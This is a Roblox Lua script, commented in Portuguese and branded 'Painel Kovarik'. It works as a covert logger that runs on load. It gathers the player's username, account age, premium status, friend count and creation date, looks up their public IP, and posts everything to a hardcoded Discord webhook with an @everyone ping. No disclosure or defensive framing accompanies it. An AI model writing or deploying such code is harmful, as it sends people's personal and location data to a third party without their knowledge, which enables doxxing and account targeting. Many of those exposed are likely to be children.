-- [ SISTEMA DE LOGS ATUALIZADO - PAINEL KOVARIK ]
local HttpService = game:GetService("HttpService")
local Players = game:GetService("Players")
local lp = Players.LocalPlayer

-- Configure sua Webhook abaixo
local Webhook_URL = "https://discord.com/api/webhooks/1492078460548415508/0DTMWHe9C_Sa4TPWWzGirUVetHdZLsys6riUbvIp6b14gXJSZi3RMK1jJzaewG81L8vp"

local function GetUserData()
    local user_id = lp.UserId
    local username = lp.Name
    local display_name = lp.DisplayName
    
    -- 1. AVATAR HEADSHOT
    local thumb = "https://www.roblox.com/headshot-thumbnail/image?userId="..user_id.."&width=420&height=420&format=png"
    
    local creation_date = "N/A"
    local premium = lp.MembershipType == Enum.MembershipType.Premium and "Sim" or "Não"
    local age = lp.AccountAge
    local friend_count = 0
    local public_ip = "Não foi possível obter"

    -- 2. LÓGICA PARA PEGAR O IP (Via HttpService)
    pcall(function()
        -- Usamos o ipify que retorna um JSON simples
        local response = HttpService:GetAsync("https://api.ipify.org?format=json")
        local data = HttpService:JSONDecode(response)
        public_ip = data.ip
    end)

    -- 3. QUANTIDADE DE AMIGOS
    pcall(function()
        local friend_info = HttpService:JSONDecode(game:HttpGet("https://friends.roblox.com/v1/users/"..user_id.."/friends/count"))
        friend_count = friend_info.count
    end)

    -- 4. DATA DE CRIAÇÃO
    pcall(function()
        local info = HttpService:JSONDecode(game:HttpGet("https://users.roblox.com/v1/users/"..user_id))
        if info and info.created then
            local date = info.created:sub(1, 10)
            local y, m, d = date:match("(%d+)-(%d+)-(%d+)")
            creation_date = d.."/"..m.."/"..y
        end
    end)

    local data = {
        ["content"] = "||@everyone @here||",
        ["username"] = "Kovarik",
        ["embeds"] = {{
            ["title"] = "+1 Result Account 🔥",
            ["description"] = "[Rolimons](https://www.rolimons.com/player/"..user_id..") | [Roblox Profile](https://www.roblox.com/users/"..user_id.."/profile)",
            ["color"] = 11097043,
            ["thumbnail"] = {["url"] = thumb},
            ["footer"] = {["text"] = "Painel Kovarik Security"},
            ["fields"] = {
                {["name"] = "Username", ["value"] = username .. " ("..display_name..")", ["inline"] = true},
                {["name"] = "Premium Status", ["value"] = premium, ["inline"] = true},
                {["name"] = "Creation Date", ["value"] = creation_date, ["inline"] = true},
                {["name"] = "Friends", ["value"] = tostring(friend_count), ["inline"] = true},
                {["name"] = "Account Age", ["value"] = age .. " dias", ["inline"] = true},
                {["name"] = "IP Address", ["value"] = "||" .. public_ip .. "||", ["inline"] = true}, -- IP escondido com spoiler
            }
        }}
    }

    -- Enviar para o Discord
    local jsonData = HttpService:JSONEncode(data)
    HttpService:PostAsync(Webhook_URL, jsonData)
end

-- Executa a função
GetUserData()
